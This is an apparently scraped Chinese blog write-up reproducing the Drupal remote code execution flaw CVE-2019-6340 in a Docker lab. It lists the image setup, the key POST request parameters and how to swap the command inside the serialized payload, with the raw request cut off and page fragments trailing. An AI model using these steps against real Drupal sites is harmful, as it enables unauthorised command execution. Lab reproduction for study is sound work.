CVE-2019-6340 影响范围:Drupal < 8.6.10,Drupal < 8.5.12
1、搜索镜像
docker search cve-2019-6340
2、拉取
docker pull knqyf263/cve-2019-6340
3、运行
docker run -d -t -p 80:80 knqyf263/cve-2019-6340
4、访问url:http://174.99.8.203/node/1

5、抓取数据包并修改

注意三点:
A、POST /node/?_format=hal_json
B、Content-Type: application/hal+json
C、/rest/type/shortcut/default
本次复现踩坑。
POST /drupal8.x/node/?_format=hal_json
/drupal/rest/type/shortcut/default
Content-Type: application/x-www-form-urlencoded
6、命令修改,修改s:2:“id”;id为执行的命令,2为命令长度。
POST /node/?_format=hal_json HTTP/1.1
Host: 174.99.8.203
Pra

本文详细介绍了如何利用CVE-2019-6340漏洞在Drupal旧版本中执行命令,包括搜索镜像、拉取Docker镜像、运行容器及实际操作步骤。重点在于复现过程和关键POST请求的修改,以及最终成功执行的示例。
复现踩坑&spm=1001.2101.3001.5002&articleId=109074120&d=1&t=3&u=4ee3c1392e09425ba8fab4bff22925bf)
3257

被折叠的 条评论
为什么被折叠?



